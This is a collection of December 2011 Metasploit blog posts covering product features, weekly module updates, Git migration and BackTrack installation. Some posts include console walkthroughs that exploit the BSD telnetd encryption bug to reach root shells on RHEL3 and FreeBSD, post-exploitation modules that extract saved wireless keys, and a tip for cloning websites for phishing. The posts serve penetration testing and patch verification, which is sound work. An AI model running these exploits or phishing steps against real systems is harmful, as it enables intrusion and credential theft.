Skip navigation
All Places > Metasploit > Blog > 2011 > December

"I'm more comfortable with the Metasploit command line," is an objection I often hear from long-time Metasploit Framework users who are thinking about purchasing a copy of Metasploit Pro or Metasploit Express. What many penetration testers don't know is that you can use the command line in the commercial Metasploit editions, and leverage their advantages at the same time.


Reporting: The commercial Metasploit editions include one-click reporting that includes any work you have completed on the command line. No more cutting and pasting screenshots and collecting password hashes. Simply conduct your penetration test on the command line, then generate the reports - either through the command line or the Web UI. Note that the FISMA and PCI reports are exclusive to Metasploit Pro, while all other reports such as the executive report are available in all commercial editions.


Switching between Web UI and command line: You can switch between the Web UI and the command line version of Metasploit for various tasks, depending on which tool is better suited for which task. For example, you can work with the Web UI to discover the network and import scan data, switch to Metasploit Framework to do exploitation, and keep an overview of your sessions in the Web UI. You don't have to choose interface over another - just use them as two sides of the same tool.


Pro-commands.jpgMetasploit Pro Console: With Metasploit Pro, you'll have access to powerful advanced commands in addition to the regular Metasploit Framework commands. These commands include:


  • pro_discover: Rather than using nmap and importing the results, this feature leverages nmap plus additional techniques to discover hosts, scan for open ports, and fingerprint operating systems and services.
  • pro_exploit: While Metasploit Framework can only exploit one host, one exploit at a time, this feature can test all discovered hosts with all suitable exploits in one step. Choose exploits according to their reliability in exploiting systems safely. In addition, Metasploit Pro automatically chooses only the exploits that are appropriate for your operating system and the ports open on the specific system. Once you have successfully exploited a machine, you won't lose the session again because the Meterpreter payload supports persistent sessions and listeners so that the target machine actively re-establishes a session when it drops. You can also replay previously successful attacks to simplify verification of patch installation and configurations changes.
  • pro_bruteforce: With Metasploit Framework, you can bruteforce one service at a time. Metasploit Pro offers smart brute forcing to simultaneously conduct a password strength audit on many account types and services. Before simulating a brute force attack, you can choose which account types should be tested, for example based on their lockout risk. The password guesses are based on default passwords, default and custom dictionaries, and from information gathered during the network scan. Using credential recycling and pass-the-hash techniques, you can reuse collected passwords and hashes to gain access to other systems.
  • pro_collect: Gather proof of access and obtain authentication credentials to go even deeper. Unlike in the Metasploit Framework, where you have to manually collect evidence, Metasploit Pro gathers system information, screenshots, passwords, SSH keys and files, all just with one command. You can further automate the evidence collection with macros that run your choice of post-exploitation tools, e.g. a key logger. Additionally, you can extend the access of Metasploit Pro by recycling and replaying capture authentication credentials to extend access to a greater number of targets.
  • pro_report: Generate reports in PDF, RTF, HTML, or XML format. Available standard reports include the Executive Summary, Detailed Audit Report, Compromised Hosts, Collected Evidence, Network Services, Authentication Tokens, Web Vulnerabilities, PCI DSS Report, and FISMA Report.  You can choose to exclude sensitive information from the reports, for example you can mask username/passwords, or exclude screenshots or collected passwords.
  • pro_user: With Metasploit Pro, you can collaborate in teams on any project, share results, and report on the entire team's findings using the reporting functionality. The pro_user command lists all registered Metasploit Pro users in your Metasploit instance.


Some Metasploit Pro features are not yet implemented in the command line, such as web application scanning, auditing and exploitation as well as the social engineering campaigns.


When using the Metasploit command line with the commercial features, please ensure that you are using the stable trunk, which shares the database with the Web UI, not the development trunk. To access a console that uses the stable trunk, launch the 'Metasploit Console' link in Windows or the /opt/metasploit-4.1.3/msfpro executable on Linux. For more information, see this discussion.


If you would like to test Metasploit Pro, download a free trial today!

VPN Pivoting is one of the best but also most elusive features in Metasploit Pro, so the best way is to see it. That's why I've decided to post a snippet of a recent webinar, where HD Moore shows this feature in action.


VPN pivoting enables users to route any network traffic through an exploited host with two NICs to a different network. For example, you could run nmap, Metasploit network discovery, or Nexpose vulnerability scans through the VPN pivot. Using a TUN/TAP adaptor on the Metasploit Pro machine, the exploited host shows no trace of a new network adapter. This enables you to get full access to a local network after having exploited a single machine, e.g. after a social engineering attack. Here's the video:



Note: This video is an excerpt from the webinar about Metasploit 4.1 entitled “What's new with Metasploit? HD Moore's personal tour of the next product version”. To view a recording of this webinar, please visit this page

It's Wednesday, and while many of you are enjoying the week off between Christmas and New Years, we've been cranking out another Metasploit Update.


Telnet Encrypt Option Scanner and Exploits

I won't rehash this subject too much since HD already covered these modules in depth here and here, but this update does include exploits for CVE-2011-4862, written by Jaime Penalba Estebanez, Brandon Perry, Dan Rosenberg, and HD Moore. These exploits are kind of a big deal; not only are traditional servers running telnet vulnerable, but there are about a zillion embedded and network devices that enable telnet servers and use BSD and Kerberos5 derived code. Thanks to the Metasploit scanner module, administrators and pentesters alike can quickly audit their environment for suspect telnet servers.


Metasploit Lab

This week, Jonathan Cran cranked out a bunch of small fixes to the 'lab' plugin for compatibility and usability. If you haven't had a chance to experiment with the lab plugin, it's just a matter of `load lab` and `help` to get started from the Metasploit Framework console. Despite the unassuming name, this plugin is hugely useful for both professional and amateur Metasploit developers, since it allows for direct access to running Virtual Machines -- this can speed up exploit development time considerably, since you can RC-script most major management tasks on VMware and VirtualBox hosted targets after firing off in-progress exploits and fuzzers.


Getting Started with Easy Exploits

This update also sees the addition of an exploit for the OpenTFTP (CVE-2008-2161). We had this vulnerability up on the Contributing to Metasploit wiki page for a couple weeks, which is a list of relatively "easy" exploits that Metasploit newbies ought to take a crack at. Out of the blue, first-time contributor "steponequit" submitted a pull request with a fully functional exploit and a link to the vulnerable version of the software, which was thought to have been lost to the mists of time. Also, he gave us this excellent protip: If you're looking for old versions of opensource software, take a look at the archives on -- it's a treasure trove of out-of-date software, all ready to be exploited for fun and practice.


Other New Modules

In addition to all of that, we have new modules for scanning and using default administrator credentials on OKI printers, exploits for Plone (CVE-2011-3587) and Splunk (CVE-2011-4642), and an exploit for the  Oracle Job Scheduler as described in David Litchfield's Oracle Hacker's Handbook.



For those of you who rely on the msfupdate command to track Framework development, you already have these sitting in your local checkout. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new Framework hotness today when you check for updates through the Software Updates menu under Administration.


For more details on what's changed and what's current, please see Jonathan Cran's most excellent release notes.

In my last post, I discussed the recent BSD telnetd vulnerability and demonstrated the scanner module added to the Metasploit Framework. Since then, two new exploit modules have been released; one for FreeBSD versions 5.3 - 8.2 and another for Red Hat Enterprise Linux 3.


Starting with an updated copy of the Metasploit Framework, load the console and kick off the scanner:


$ msfconsole

msf> use auxiliary/scanner/telnet/telnet_encrypt_overflow

msf auxiliary(telnet_encrypt_overflow) > set RHOSTS

msf auxiliary(telnet_encrypt_overflow) > set THREADS 64

msf auxiliary(telnet_encrypt_overflow) > run

[+] VULNERABLE: localhost.localdomain (Linux release 2.4.21-4.EL #1 ...

[+] VULNERABLE: FreeBSD/i386 (freebsd.localdomain) (pts/0)\x0d\x0a\x0d\x0alogin:

[*] Auxiliary module execution completed


For the first target (Linux), we will choose the RHEL 3 exploit:


msf> use exploit/linux/telnet/telnet_encrypt_keyid

msf exploit(telnet_encrypt_keyid) > set RHOST

msf exploit(telnet_encrypt_keyid) > exploit

[*] Started bind handler

[*] Brute forcing with 1 possible targets

[*] Trying target Red Hat Enterprise Linux 3 (krb5-telnet)...

[*] Sending first payload

[*] Sending second payload...

[*] Sending stage (36 bytes) to

[*] Command shell session 1 opened



uid=0(root) gid=0(root)


Abort session 1? [y/N] y


[*] Command shell session 1 closed.  Reason: User exit


Easy enough, now on to our FreeBSD target:


msf> use exploit/freebsd/telnet/telnet_encrypt_keyid

msf exploit(telnet_encrypt_keyid) > set RHOST

msf exploit(telnet_encrypt_keyid) > exploit

[*] Started reverse handler on

[*] Brute forcing with 9 possible targets

[*] Trying target FreeBSD 8.2...

[*] Sending first payload

[*] Sending second payload...

[*] Command shell session 2 opened



uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)


That about sums it up. If for some crazy reason you are running telnet on your BSD systems or have the bad luck to be using a BSD-derived telnet daemon on linux (such as krb5-telnet), patch or upgrade to SSH as soon as possible. If you would like to contribute a new exploit target for either Linux or Windows, all we typically need is the output of the following command:


$ msfelfscan -j edx /path/to/telnetd (msfelfscan is part of the Metasploit Framework)


The exploit is ridiculously simple and only a single jmp target is needed to add reliable targeting for a new platform. Supporting BSD variants such as Dragonfly, NetBSD, and so is likely to require no more effort than a new jmp target (assuming no major compiler changes).


Dan Rosenberg confirmed that BSD-derived telnet CLIENTS are vulnerable as well, but we have not added any exploits for the client side at this time. Thanks again to Brandon Perry for getting the ball rolling on the exploit code and testing against multiple targets.



On December 23rd, the FreeBSD security team published an advisory stating that a previously unknown vulnerability in the Telnet daemon was being exploited in the wild and that a patch had been issued. This vulnerability was interesting for three major reasons:


  1. The code in question may be over 20 years old and affects most BSD-derived telnetd services
  2. The overflow occurs in a structure with a function pointer stored after the target buffer (Line 166)
  3. The telnet service is still prevalent enough that it was being exploited in the wild in the first place


On December 27th, Jaime Penalba Estebanez (of Painsec) released a shiny exploit for FreeBSD 8.0, 8.1, and 8.2. This exploit works extremely well due to the conditions when the vulnerability is triggered. Essentially, the location of the buffer provided by the user is static per binary (data section) and exploiting this only requires access to a copy of the same binary from the target platform and knowledge of a readable address. This is about as easy as it gets for remote memory-corruption exploits on the BSD platform.


A port of this exploit to the Metasploit Framework is in progress and we just added a scanner module that can be used to identify vulnerable instances of the telnet service. This module tries to trigger the vulnerability with an invalid pointer, causing the inetd-spawned process to exit. Since this process automatically respawns, it should be safe to scan all affected inetd-based systems. To use the scanner module, make sure your copy of the framework is updated, and launch the Metasploit Console:


$ msfconsole

msf> use auxiliary/scanner/telnet/telnet_encrypt_overflow

msf  auxiliary(telnet_encrypt_overflow) > set RHOSTS

msf  auxiliary(telnet_encrypt_overflow) > set THREADS 64

msf  auxiliary(telnet_encrypt_overflow) > run

[+] VULNERABLE: Linux 3.0.0-14-generic ( (pts/11)...

[+] VULNERABLE: FreeBSD/amd64 (freebsd) (pts/0)\x0d\x0a\x0d\x0a...

[+] VULNERABLE: FreeBSD/i386 (freebsd) (pts/0)\x0d\x0a\x0d\x0a...

[+] NOT VULNERABLE: No reply to 64-byte Key ID: SUNTEN SunOS 5.10...


[*] Auxiliary module execution completed


Although this vulnerability was reported as a flaw in FreeBSD, it also affects other BSD variants and any telnet service based on the BSD code. This includes quite a few non-BSD systems as well, such as:


  • Older versions of Mac OS X (newer versions do not include the ENCRYPT option). 10.0-10.3 or so may be vulnerable
  • Older versions of Solaris (unconfirmed). Newer versions already enforce a 64-byte Key ID. Maybe Sun/Oracle found this and forgot to share.
  • Linux installations using inetutils telnetd (as opposed to netkit telnetd). Debian and Ubuntu still package this and some older distributions of Linux appear to ship with it by default. So far, the only "common" case appears to be RHEL3 (or at least some of its free clones).

There is a good chance that the same flaw affects (or at least, used to affect) other commercial Unix variants (BSDi, SCO, AIX, HP-UX, etc). We are still trying to identifiy which specific operating systems packaged code base on the vulnerable BSD upstream. There is also a chance that this bug will affect older embedded Unix deployments as well. So far, most of the recent embedded Linux distributions use BusyBox or NetKit for telnet, but it wouldn't be crazy for a vendor to package the inetutils version instead.


There is also a chance that this flaw affects Telnet clients; this opens the door to client-side exploitation through any method of forcing (or enticing) a user to access a particular telnet service. This is all fairly preliminary - we should have a followup blog post available soon with additional information about the scope and exploitability of this flaw.


Huge thanks to Dan Rosenberg and Brandon Perry for digging into this with me, along with all of the folks on Twitter who helped test/verify affected systems.



Yesterday I asked a question on Twitter and got a lot of responses from the security community.


I was finishing up a Metasploit module that I was coding last weekend. I posed the challenge to myself of scanning for egress port while not actually inside a network. I accomplished this task setting up multiple listeners, and embed HTTP <img> tags in a webpage. This can easily be done with Metasploit Framework. I created a report page and a stealth page with no images. Metasploit keeps track of the connections on the attacker side as well. I also wanted to do this module without Javascript because browsers are getting smarter about Javascript doing weird things. Also I have some ports on here (23, 25, etc) that are blocked by some browsers, but you never know so I included them as well.



You can download the module at my Github wait for it to appear in the Metasploit trunk. In the meantime if you have a question about it, please leave a comment below.





Cloned.jpgSocial engineering campaigns can be a lot more effective if you can impersonate a well-known website that users trust. However, when you simply clone a website by cutting-and-pasting the page source and putting it on your own server, your links will stop working. Copying all links and images from the other site can be cumbersome, but there's an alternative: the HTML <base> tag. It specifies a default address/target for all links on a page; it is inserted into the head element.


Let's say you've just cloned a page from the website Initially, all images will be broken. Once you drop this little line into the header section of your page, they will appear like on the original page - and all relative links will work as well:


<base href="" />


Please note that it may be illegal to clone a website if you don't have the website owner's consent. Also, you need to have permission before you launch an engineering attack, usually from the organization who's employees you are auditing.


Please share any other helpful social engineering tips in the comments section below. If you'd like to try out web-based social engineering attacks, download a free trial of Metasploit Pro.

The Metasploit Update is out, and it's a little smaller than you might expect. We've recently rejiggered our development to QA to release workflow here at Rapid7, and that means that this week, we cut the release a couple days earlier than usual in order to ensure the work flow all makes sense and that the releases get the post-commit QA attention that they deserve. The end result is that we'll have a pretty light release this week (due to the shortened development cycle), but going forward, week-to-week changes should hit about the same volume as before.

TFTP Client Library

Metasploit Framework already ships a library for emulating a TFTP server, used mostly for setting up a rogue PXE server. PXE (pre-boot execution environment) is used to deliver operating system configuration details, so by running your own, you can pre-compromise unwary PXE clients. While that's pretty awesome in and of itself, I was kind of amazed to find no reasonable client-side implementation. What if a pen-tester lucks into finding a PXE server that has write access enabled? With the help of community contributor K. Reid Wightman, Metasploit features a new TFTP client library. With this, a penetration tester can now seize control of that legitimate PXE server and provide custom, pre-owned netboot images.


For usage details for the library, just take a peek at auxiliary/admin/tftp/tftp_transfer_util, which provides file upload and download functionality. Of course, you're not limited to merely squatting on PXE servers -- apparently, there are plenty of write-enabled TFTP servers floating around internal networks responsible for all sorts of interesting gear.

Firewall Fingerprinting

Another module of note is Patrick Webster's community submission, the auxiliary/gather/checkpoint_hostname module. This module takes advantage of an information leak present on current versions of CheckPoint's Firewall-1 product, disclosing not only the firewall's hostname, but the hostname of the associated SmartCenter management host. Not only is positively fingerprinting a client's firewall vendor pretty useful for the penetration tester, but getting the management console's hostname for free is an added bonus that can help the pen-tester concentrate efforts on a high-value target.


Perhaps the most noteworthy aspect of this module is that it's apparently 0-day. At first, it looked like a repackage of the 2001 vulnerability described by SecuriTeam, but Patrick insists that it's a) different and b) recent. So, you're not going to find a proper advisory or CVE number or anything for this.

New Modules

The other two modules of note in this release are auxiliary/admin/edirectory/edirectory_edirutil, which leverages the vulnerability described in CVE-2008-0926 to gain unauthorized access to logs and the ability to start and stop services on Novell's eDirectory server, andpost/windows/gather/credentials/razorsql, which is a post-exploitation module that makes quick work of saved database administrator credentials on a compromised workstation.


For those of you who rely on the msfupdate command to track Framework development, you already have these sitting in your local checkout. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new Framework hotness today when you check for updates through the Software Updates menu under Administration.


For more details on what's changed and what's current, please see Jonathan Cran's most excellent release notes.

Marcus J. Carey put together some great Metasploit Tutorial videos about Metasploit Community that I want to share with you. Metasploit Community Edition simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners such as Nexpose – for free. You can view these videos to get started with Metasploit Community, or to get a first impression of the product.


Scanning Networks with Metasploit Community



Basic Exploitation with Metasploit Community


Basic Exploitation vs. Smart Exploitation


Importing Nexpose Scan Data into Metasploit


Using Metasploit Community with Nexpose


If you don't have them already, download the free Metasploit Community Edition penetration testing tool and the free Nexpose Community Edition vulnerability scanner now!

metasploit-moves-from-svn-to-github.pngThe Metasploit project recently switched from SVN to Git/GitHub for source code management. Since then, there have been a number of questions from the community about using Git -- both in general and in the context of the framework.  Let's try shining a little light.


Why did we change?

Git makes it easier to collaborate and to implement complex workflows among developers, which is ideal both for open-source projects and for Agile/Scrum/XP-oriented teams.  As a commercial open-source operation, Rapid7 fits both these descriptions.  There's also a decent argument to be made for the idea that Git is simply a *better* way to manage source code than Subversion -- that it represents an evolutionary leap forward in source control, and that any pain devs feel in switching to it will rapidly be forgotten as soon as they start making use of its many advantageous features.


In the last four years or so, I've converted several projects and several dozen devs to using Git.  Not one of them has ever felt like going back to SVN.


How is Metasploit using GitHub?

The most important thing that contributors need to be aware of us the concept of the Pull Request.  This is how your code patches can make it into the framework.  The Pull Request is not part of Git itself, but rather a workflow for code collaboration that GitHub has built into their system.  As a way to integrate multiple contributors into the process of improving Metasploit, it is invaluable.


First things to do when switching to Git


     1. Install the cheat gem:


     gem install cheat


     2. Colorize and customize ~/.gitconfig per the great stuff in the cheat sheet:


     cheat git



     3. Make yourself aliases for common commands, either with bash directly or with the alias feature of git config (outlined in cheat sheet).



     4. Bookmark these things:


     Start w/ the Rapid7 resources.  There's a "survival guide" cheatsheet in there that we put together with the most-common git commands broken down by scenario, as well as a link to the excellent Git SVN Crash Course, which is probably the fastest way for SVN-savvy devs to come up-to-speed on Git.


      5. Get comfortable with a graphical merge tool for fixing conflicts in merges (Linux: kdiff3 or Meld, OS X: default is FileMerge)


Warning and Encouragement


Like any super-powerful, paradigm-shattering piece of software, Git has a learning curve.  You will need to spend *some* time understanding it in order to be able to use it, as many of the SCM concepts you're used to simply won't apply, and there are also many new concepts specific to Git.  Don't let this get you down.  You will soon wonder how you ever used anything else.

Update: I just published a new blog post for using Metasploit on BackTrack 5 R2.


BackTrack 5 R1 comes pre-installed with Metasploit Framework 4.0. Unfortunately, Metasploit Community, which brings a great new Web UI and other functionality, was introduced in version 4.1, so it's not included by default. Updating Metasploit Framework using the msfupdate command will not install the Web UI. In addition, BT5 only makes the development trunk available, not the stable trunk (read about the difference). This post tells you how you can update your version of BackTrack5 to Metasploit Community, including both the stable and the dev trunk of Metasploit Framework. If you want to use Metasploit Express or Metasploit Pro on BackTrack5, follow the same instructions and enter your product key at the end to activate your commercial Metasploit edition.


Installing Metasploit Community over the existing Metasploit Framework installation won't work for several reasons, one being a conflict with the postgres database. The best way is to start by uninstalling Metasploit Framework v3 first. After logging on to BT5 (user: root / password: toor), use the following command to uninstall the software:






After the uninstall has completed, enter the BacktTrack GUI with the following command:




Open Firefox (menu Applications / Internet / Firefox Web Browser), go to and download the Linux installer. When the download has completed, open a terminal window and enter the following commands:


chmod u+x /root/





At the end of the installer, the Metasploit Web UI opens in Firefox (hint: it's opened behind your terminal window). Since the Metasploit UI uses a user-generated, unsigned SSL certificate, Firefox complains that the connection is untrusted. Click on I understand the risks, Add Exception..., and Confirm Security Exception


By default, Javascript is disabled in the Firefox BackTrack installation. You should enable Javascript for https://localhost first. To do this, click on Options... on the bottom right of your screen, and select Allow https://localhost.




Enter a username and password, and click Create Account. Click on Register your Metasploit license here!


Firefox on BackTrack is very restrictive with Javascript and redirects, so the registration process is more cumbersome than with a standard Firefox installation. The registration page is hosted on, leverages several background services to generate the product key, and requires Javascript. Here is what you need to do to register the license.


  1. Click on Options... on the bottom right of your screen, and select Temporarily allow all this page.
  2. Once again click on Options... on the bottom right of your screen, and select Temporarily allow all this page.
  3. Enter your email address and hit Go.
  4. Once again click on Options... on the bottom right of your screen, and select Temporarily allow all this page.
  5. Hit Go again.
  6. You'll see a redirect warning that starts with "Request". Simply ignore it.
  7. Close the tab. You should now be back in the Metasploit Web UI




Within 5 minutes of completing the form, you'll receive an email with a product key. Copy it to the Product Key field, then click Activate License. You should now see this success message:




Congratulations, you're good to go!


UPDATE - Jan 3, 2011


The BackTrack folks just published that you can now get the new unifed Metasploit installer with a dist-upgrade operation or through apt-get. The open source Metasploit trunk is still present under /opt/metasploit/msf3/.

Sample Resource Scripts

About a week ago, munky9001 posted on Reddit the headline, DB_Autopwn Deprecated! About time. Shortly after, HD wrote up a blog post, Six Ways to Automate Metasploit, with the moral of the story being, "don't cry for db_autopwn, there are already much better methods to get your automated pwnage on." Of these, the easiest and most straightforward way to automate things is to write a resource script.


This week's update now includes a standard location for resource scripts contributed by the Metasploit community, creatively named $install_dir/scripts/resource . Running scripts out of this location from the framework command prompt is as straightforward as


> resource scripts/resource/rc_script_name.rc


...and you're off.


There's exactly one rc script in there right now (thanks Mubix!), but if you have a resource script that you'd like to share, please feel free to submit it via a pull request to our GitHub repository -- especially if your favorite resource script does something novel and interesting with modules, targets, or something we haven't thought of yet.


New Modules

Metasploit contributor pello brings us a new auxiliary module, dns_fuzzer.rb. As part of testing, I threw this module against three different DNS resolvers to just watch the traffic, and promptly crashed one of targets. Clearly, grown-up DNS servers shouldn't fall over in the face of malformed traffic delivered at regular Internet speeds, so if you're feeling like hunting for remote 0-day for fame and fortune, you could do worse than starting with this module.


We have three new modules exploiting CVE-classified bugs: CVE-2011-4350, which affects the Yaws webserver; CVE-2011-4453, which affects the PHP application PmWiki; and CVE-2005-4832, which affects Oracle Database Server 10g. The Oracle bug dates back to 2005, but as mentioned last week, running installations of older, unpatched software is often a surprising finding that a penetration tester can present to a client.


As for the non-CVE-classified exploits, we're now shipping modules for Family Connections (a quasi-blog application), Traq (a bug tracking application), Ability Server (a commercial FTP server), and CoDeSys Webserver. That last one with the funny camel-cased name apparently has something to do with a webserver that's used to control remote PLC's for SCADA operations, so the fact that it's unclassified seems a little disconcerting.


For those of you who rely on the msfupdate command to track Framework development, you already have these sitting in your local checkout. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new Framework hotness today when you check for updates through the Software Updates menu under Administration.


For more details on what's changed and what's current, please see Jonathan Cran's most excellent release notes.

Metasploit development moves fast. Blindingly fast, fueled by tons of open source contributors -- which is one of the reasons why we moved away from our tried and true SVN repository and on to GitHub. Now that we're on a more modern, more social development platform, we have all new ways to get overwhelmed with the pace of change on the Framework, especially since contributor code is that much easier to integrate now. So, in order to ensure that the more notable week-over-week changes get their due, I'll be publishing a weekly blog post with a headline-style overview of the latest changes that ship out with our scheduled weekly updates.


FastLib Library Compression


Long-time Metasploit Framework users like to complain about Framework's start-up time. Measured in seconds, it does sometimes feel like it takes a lot longer, especially when you're developing new Framework functionality and restarting a lot.


To be fair, it takes a few cycles to get all those hundreds of thousands of lines of interpreted Ruby code from the disk into memory. However, in the spirit of alleviating this popular pain point, we've included an alpha version of FastLib. Developed in-house, Fastlib is an open source project that should help knock a couple seconds off that dreaded startup time. Like the rest of Metasploit Framework, it's open source, so if you have other complex Ruby projects, you might want to take a look at the implementation over on GitHub at


In addition to speeding up library loads, FastLib supports compression, obfuscation, and custom encryption. The integration of FastLib into the Metasploit Framework allows modules to be combined into FastLib archives and loaded from any module directory in the standard load path. FastLib alpha-quality and likely to change as the code continues to improve. A future blog post will detail methods for optimizing a Metasploit Framework installation for embedded devices using FastLib.


New Exploits


Legacy applications are the bread and butter of penetration testing -- those usually forgotten, universally unloved, and sometimes rogue applications that are quietly waiting to provide a foothold into the organization's critical infrastructure. In that vein, we have new modules this week for legacy versions of IPSwitch WhatsUp Gold and Serv-U FTP Server. We also have exploits for the recently disclosed vulnerabilities in CCMPlayer and Avid Media Composer, submitted by community contributors Rho and vt, respectively.




For those of you who rely on the msfupdate command to track Framework development, you already have these sitting in your local checkout. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new Framework hotness today when you check for updates through the Software Updates menu under Administration.


For more details on what's changed and what's current, please see Jonathan Cran's most excellent release notes.



Over the last few weeks the Metasploit team at Rapid7 has engaged in an overhaul of our development process. Our primary goals were to accelerate community collaboration and better define the scopes of our open source projects. The first step was to migrate all open source development to GitHub. This has resulted in a flood of contributors and lots of great new features and content.


One controversial change involved removing old, buggy automation tools that simply didn't meet the quality bar, or our scope for the framework. This resulted in the removal of file_autopwn and db_autopwn. Both of these modules were easy to use, but were more likely to fall over and crash than produce useful results. The db_autopwn code started off as a joke and never reached a point where it was actually stable. For anyone who really wants to use db_autopwn, a community contributor maintains it as a plugin in a GitHub fork.


The Metasploit products (inlcuding the open source Metasploit Framework) support automation at multiple levels. How you automate the product depends on what type of task you are working on and the granularity needed. The list below is not comprehensive; there are an infinite number of ways to extend, include, and automate Metaspoit, but these are the best supported and most common methods.



The Metasploit Console


Resource Scripts


The console (msfconsole or msfpro) supports basic automation using Resource Scripts. These scripts contain a set of console commands that are executed when the script loads. In addition to basic console commands, these scripts are also treated as ERB templates. ERB is a way to embed Ruby code directly into a document. This allows you to call APIs that are not exposed via console commands and even programmatically generate and return a list of commands based on your own logic. Resource Scripts can be specified with the -r option to the Metasploit Console and ~/.msf4/msfconsole.rc is automatically executed on startup if it exists. Resource Scripts can also be executed from the console prompt through the resource command. For more on this approach, see Automating the Metasploit Console.




The console (msfconsole or msfpro) also supports the concept of Plugins. Plugins add new console commands that provide a utlity or automation function. The flexibility of the Ruby language allows Plugins to do nearly anything, from exposing new automation capabilities, to providing socket-level content filtering to prevent the tripping of a remote IDS. Direct integration with Nexpose, Nessus, and OpenVAS from the console are accomplished through plugins. The full list of default plugins can be found in the GitHub repository. Plugins are the suggested way to work on new console commands and share them with the wider community.


Auxiliary Module Custom Commands


Auxiliary modules are defined as any Metasploit module that performs a remote operation of some sort, but doesn't take an actual payload like an exploit. Auxiliary modules handle things like reconnaisance, authentication bypass, network sniffing, and vulnerability discovery. One little-used feature of Auxiliary modules is the ability to define new console commands from within the module context. The user would enter "use auxiliary/module/name" and if the module exposes new commands, these would become available to the console. One example is the TrendMicro ServerProtect File Access module.



Custom Auxiliary Modules


Although we do not accept modules that run other modules into the Metaspoit Framework proper, these are trivial to create as custom modules and allow for any form of automation, exposed through any supported user interface. The major advantage to writing automation tools as Auxiliary modules is that they will usually work just fine from Metasploit Community Edition or Metasploit Pro, as well third-party interfaces like MSFGUI. One example of an existing automation module in the framework (and one that is still being reviewed from a design perspective) is browser_autopwn. This module will automatically configure exploit modules and redirect the target to the appropriate one. The reason why this isn't really a good fit for the framework is that payload and target selection are hardcoded to values that may not always work. We are looking into better ways to handle client-side exploit automation, but until then, it serves as an in-tree example of Auxiliary module automation.



Metasploit Remote API


The Metasploit Framework and Metasploit Pro both support automation using a documented Remote API. On the framework side, this exposes a wide range of functionality at the lowest level, allowing the caller to run modules, interact with sessions, and generally access the backend of the Metasploit instance. Metasploit Pro builds on this by offering access to the commercial product features through the same API. In fact, the Metasploit Pro user interface uses this same API to drive the backend automation. The product was built with automation and extensibility in-mind. Using Metasploit Pro with the Remote API makes it painless to remotely automate a penetration test, across multiple instances of Pro, all from a central location. Rapid7 customers are using this today to conduct automated exploitation during off-hour scan windows and to automate things like password testing across dozens of remote sites at once, with centralized reporting. You can find examples of the Pro API automation in the documentation directory of the framework. The msfrpc-client GEM is available for Ruby developers.



Ruby Programming


At the end of the day, the Metasploit Framework is a development environment more than it is a standalone product. The APIs offered make it easy to embed a copy of the framework into another tool, parse the module database looking for a specific set of criteria, or even repurpose the existing network APIs to build something new. Each of the previous methods makes it easy to load custom Ruby code and leverage that code in a useful way; to get the most out of the Metasploit products, it helps to become familiar with the framework API itself. Nearly all of the framework code is available under an open source license and the latest changes can be found in the main GitHub repository. Metasploit Pro customers are encouraged to contact support (and likely, from there, the development team) about any ideas they have for development or integration. Nearly any code written for the Metasploit Framework is drop-in compatible with Metasploit Pro.





If you have any questions about automation, the Discussion forum in the Rapid7 Community is a great way to get started. For realtime discussion, the #metasploit channel on the FreeNode IRC network (#metasploit) is a great resource as well.

The Metasploit Framework continues to grow and expand with the support of the community.

There have been many new features added to the Metasploit Framework over the past month.

I am very excited to be able to share some of these new developments with you.


Mubix's Recon Modules

Mubix's post-exploitation modules form his Derbycon talk are now in the repository. The resolve_hostname module,

originally called 'Dig', will take a given hostname and resolve the IP address for that host from the windows victim.

The enum_termserv module will dump Windows RDP connections form the victim machine, to give you a

list of other potential  targets. The computer_browser_discovery module, formerly called netdiscovery, taps the victim

machine's Computer Browser Service via Railgun. This will return a list of all machines available on the same broadcast

domain as the victim machine. an addition to mubix's original module has been made to give users the options to create

host records in the Metasploit database for any hosts discovered this way.


[*] [2011.12.05-15:35:57] Found 4 systems.


...[*] [2011.12.05-15:36:02] Netdiscovery Results



----     --            -------------   -------  -------

69635  WINXPTEST       5.1

69635   MELODIE         6.1

8556551  DMALONEY-VDSDA  5.2



Windows Wireless LAN

There are a new group of Windows Post modules under post/windows/wlan. These modules all use Railgun to hook the

windows WLANAPI. There are currently four modules in this group:


wlan_profile: This module will enumerate all of the wireless LAN interfaces on the machine. It will then enumerate all the

saved wireless profiles on each interface. If the meterpreter session has sufficient privileges it will also decrypt the wireless

key material. One caveat to this last part is that Windows XP does not actually store the WPA keyphrase. It instead stores

the derived key which was derived using the PBKDF2() function. since this is all windows stores, it is surely still usable in

this format but does not do you any good from a password reuse standpoint. On the TODO list is another module that will

make the victim machine connect to a specific network with the option of using one of the pre-saved profiles or passing it

your own profile.


msf  post(wlan_profile) > set SESSION 1


msf  post(wlan_profile) > exploit



[+] Wireless LAN Profile Information

GUID: {eb566b46-0140-4eca-800a-a5e01fae7251} Description: Intel(R) Centrino(R) Advanced-N 6230 State: The interface is connected to a network.

Profile Name: derbycon

<?xml version="1.0"?>

<WLANProfile xmlns="">



























wlan_current_connection: This module will enumerate all of the wireless LAN interfaces on the victim machine,

and then get information about the current wireless connection on each one. This information includes the MAC address

of the access point, the SSID, the BSS type, the connection type, signal strength, RX/TX rates, security settings,

encryption and authentication algorithms used, and whether 802.1x authentication is used on the network.


msf  post(wlan_current_connection) > set SESSION 1


msf  post(wlan_current_connection) > exploit



[+] GUID: {eb566b46-0140-4eca-800a-a5e01fae7251}

Description: Intel(R) Centrino(R) Advanced-N 6230

State: The interface is connected to a network.

          Mode: connection initiated by wireless service automatically using a persistent profile.

          Profile: Skynet

          SSID: Skynet

          AP MAC: xx:xx:xx:xx:xx:xx

          BSS Type: Infrastructure

          Physical Type: Extended rate PHY type

          Signal Strength: 94

          RX Rate: 54000

          TX Rate: 54000

          Security Enabled: Yes

          oneX Enabled: No

          Authentication Algorithm: WPA-PSK

          Cipher Algorithm: TKIP



[*] WlanAPI Handle Closed Successfully

[*] Post module execution completed



wlan_bss_list: This module will enumerate all of the wireless LAN interfaces on the machine. It will then scan

with each interface for new wireless networks. It then records the information about all of the available wireless networks.

This information includes a lot of the same information pulled down by the current_connection module.


msf  post(wlan_bss_list) > set SESSION 1


msf  post(wlan_bss_list) > exploit



